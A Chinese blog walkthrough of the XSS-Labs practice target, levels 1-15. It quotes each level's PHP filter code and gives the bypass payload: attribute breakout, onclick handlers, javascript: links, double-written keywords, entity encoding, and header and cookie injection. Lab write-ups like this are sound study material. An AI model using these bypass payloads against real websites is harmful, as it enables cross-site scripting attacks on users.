XSS-Lab 1-15

已于 2022-10-12 08:40:03 修改
阅读量295 收藏 1
点赞数
分类专栏: 网络安全 文章标签: xss 前端 php
于 2022-08-25 09:01:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_like_ctrl/article/details/126517298
版权

第1关

想要深刻理解xss就要理解源代码是怎么样的,就先从新手关里看看

$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";

直接获取一个叫name,并且输出这个name的值在界面上,所以我叫

?name=<script> alert(1) </script>

不过分吧

我们去看看

输完直接弹窗了

里面应该是欢迎用户什么都没有

第2关

先往输入框里输入

<script> alert(1) </script>

WTF?

我输对了啊,怎么不弹窗啊

看一眼界面源代码

原来是给我转义了

再看眼php源代码

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

原来是htmlspecialchars()函数的问题,他会将以下字符转义

字符转义
>>
<<
&&amp
"&quot

你放心接下来还会看见的

所以我们只能另寻道路

<input name=keyword  value="'.$str.'">

天无绝人之路啊,直接把value给闭合了,再注入script就可以了

"><script>alert('xss')</script>//

其中">进行闭合,而//则是注释掉

第3关

看了眼源代码,是两个都打上了htmlspecialchars()函数,就问你恶心不?

怎么办,那就弄一个点击事件得了

onclick该上场了

' οnclick='alert(1)' >//

不是再另外生成js脚本,而是直接生成一个点击事件

第4关

先试试第一关的办法

上面肯定是被转义了,下面是直接把<>给去掉了

那就再试试第三关的办法,把onclick代进去

" onclick='alert(1)' //

第5关

试一下第一关的办法,直接写进去

直接给我加_避免恶意注入了

没关系,试一下第4关的办法

诶,也不生效

赶紧去看下html界面

好家伙on也直接再中间加了个_

看了下源代码

$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);

欸嘿,还转小写.

不过,不着急

我们还可以写入一个恶意的超链接

因为他又没value的值进行检测

所以我们又可以乱写啦

"> <a href=javascript:alert('xss') > xss</a> //

第6关

先看眼源代码,淦

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

好家伙,不能像上一关那样直接写个网页了

但是他没有强制转小写啊,然后进行检测

嘿嘿,直接里面套个onclick处理

" Onclick='alert(1)' >//

第7关

看了眼源代码

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

眉头一皱,觉得事情有点不简单,tm这不是直接没了,还带转小写的

没事,魔高一尺,道高一丈,我让你删了后正好是我想要的字符不就完事了吗?

" oonnclick='alert(1)' //

欸嘿

你把我的on去掉了变成了onclick

第8关

一个友情连接吗?

肯定没这么简单 在看眼源代码

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">

前面的各种骚操作都失效了,怎么办?

诶!我给他翻译翻译不就完事了吗?

javascript='alert(1)'

转码为poc

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

直接输进去就可以了

第9关

跟第8关一样,只不过多了个http://检测

直接alert(‘http://’)就行

可以局部转换

javasc&#x72;&#x69;pt:alert('xsshttp://')

第10关

看一眼源代码

有个t_sort在里面,只是进行<>检测

那么直接来个onclick

&t_sort=" type="text" οnclick="alert('xss')

可以看见直接不隐藏了,只是因为type优先第一个

第11关

再看一眼源代码

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">

我们发现都会进行转码处理

诶 他没对http头进行处理,那么机会来了

抓包!

referer:"type="text" οnclick="alert('xss')

点一下那个方块就完事了

第12关

这个就跟第11关是一样的,要抓包,改头文件

只不过http头变为了 user-agent

user-agent:" type="text" onclick="alert('xss')

第13关

直接改cookie

$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">

我们发现他找到user的cookie 直接使用不处理

利用cookieEditor,也可以抓包

再刷新下界面

旧戏重演

第14关

不知道为啥用不了,直接15关

第15关

啥都没有,有点怪

看眼源代码

<span class="ng-include:'.htmlspecialchars($str).'">

我们可以利用ng-include.这相当于c语言里的clude

直接给他个有漏洞的php网页不就可以了吗?

?src='level1.php?name=<img src=1 οnerrοr=alert(1)>'

好了,结束,下班

真不想起名TAT
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xsslabs.zip
07-23
xss-labs是国内一个大佬开源的xss漏洞靶子,包含一些常见的xss攻击方法,是学习xss的必备工具
XSSxss-labs-level15
Hugu
02-24 704
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
xss-labs通关攻略教程(level1~level 10)
最新发布
2401_84153270的博客
04-20 268
总结来说,面试成功=基础知识+项目经验+表达技巧+运气。我们无法控制运气,但是我们可以在别的地方花更多时间,每个环节都提前做好准备。面试一方面是为了找到工作,升职加薪,另一方面也是对于自我能力的考察。能够面试成功不仅仅是来自面试前的临时抱佛脚,更重要的是在平时学习和工作中不断积累和坚持,把每个知识点、每一次项目开发、每次遇到的难点知识,做好积累,实践和总结。点击这里领取Web前端开发经典面试题。
XSS-lab靶场(11~15
bin789456的博客
05-26 307
Level 11 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_REFERER']; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); echo "<h2 align=center>没有找到和".htmlspecial
Xss-labs(1)第一关到第十一关
m0_46412408的博客
09-25 710
Xss-labs靶场训练第一关:查看页面源代码回显playload长度:插入一段js代码,get传参,一个简单的插入顺利来到第二关,二话不说先直接尝试插入,并没有成功:查看页面源代码:特殊字符被实体转义了我们需要闭合掉双引号即可,构造payload,这一关是闭合绕过来到第三关,随便输入一个闭合弹窗试试,符号也被实体化了:查看php源码。
XSS-Lab 1-10
qq_51558360的博客
03-21 249
不使用过滤器 name=<script>alert(1)</script> 闭合标签 输入第一题的答案,没有成功,查看源码,发现: 我们输入的数据,是在表单中的value属性内 法一: 所以需要先闭合input标签,然后在注入代码,闭合标签: "><script>alert(1)</script> 法二: 是闭合value属性,然后在input标签内加入事件属性: " οnclick="alert(11) 单引号闭合并添加事件 输入测试:
xss-lab全通关教程
05-07
xss-lab全通关教程,共有20个关,全部就压缩到文件里,另外购买还有可以私信博主,赠送xss环境
xss-lab靶场资源包
07-27
xss-lab靶场资源包
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
js-templates-advanced-templating-lab-v-000
02-20
JavaScript把手模板实验室 目标 练习使用把手模板 练习定义车把帮手 练习使用把手局部 介绍 在本实验中,我们将使用... < div xss=removed> < p> { { description } } < / p > { { # each ingredients } }
xsslab
m0_65151172的博客
04-08 142
(解释一下onclick函数,正常格式的onclick是这样的onclick='alert(1)',这个函数是在点击的时候触发的,之所以我们注入代码是这样的' onclick='alert(1)是因为onclick函数得在一个标签中才能被浏览器识别,所以我们第一个单引号是用来闭合value='这个单引号的,第二个单引号是用来和'>这个单引号形成闭合构成onclick正常的语句的,而且,第一个单引号和onclick 中间得有空格,这样onclick才能被识别出来是个函数 )">xss</a>,成了!
xss lab
None
11-12 817
xss lab靶场实战,共20道题目,考察多种xss漏洞绕过手段与xss技巧
xss-labs/level15
m0_71299382的博客
11-29 439
xss-labs/level15
XSS-labs
Mccc_li的博客
04-09 1067
大佬总结的xss的原理 1.level1 输入 < script>alert<\script>就通过了,这道题应该是反射型的xss,数据到了后端再回到浏览器 为什么能够运行? GET输入了name的参数,然后 PHP 会读取该参数,如果不为空,则直接打印出来,这里不存在任何过滤。也就是说,如果参数中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。 常见...
xss-lab通关记录(一)
Boom!脑洞大爆炸的博客
03-01 1348
xss-lab打通关(1-5)
XSSLab (1~10)
开心星人的博客
05-14 277
一 http://test.ctf8.com/level1.php?name=<script>alert(1)</script> 二 输入<script>alert(1)</script> 查看源码看到<input name=keyword value="<script>alert(1)<script>"> 构造 " onclick="alert(1) 三 输入" onclick="alert(1) 查看源码看到<i
xsslab练习
menghuangjh的博客
10-26 248
第七关 输入一波关键词,发现都被过滤,类似于文件上传。 想到了双写绕过,试了一下 发现可行,构造payload:"><sscriptcript>alert('1')</scripscriptt><" 第八关 还是先来试一下发现<>和"被过滤所以考虑用Javascript:alert(1) 发现被script被替换了。试了下双写还是不行。最后试了下html的实体编码。发现可以绕过。于是构造payload:&#106;&#97;&#...
XSS-labs靶场实战(六)——第15关及Angular JS利用
永远是少年
11-19 849
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS-labs靶场实战第15-17关。 一、第十五关简介 二、Angular JS简介 三、第十五关突破
XSS-Lab第十关
07-27
XSS-Lab的第十关是一个注入漏洞的挑战。根据引用\[2\],XSS-Lab是一个用于学习XSS注入的平台,每一关都有不同的XSS注入漏洞。在第十关中,与上一关不同的是会加入地址的检查。具体来说,该关会检查输入的数据中是否...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值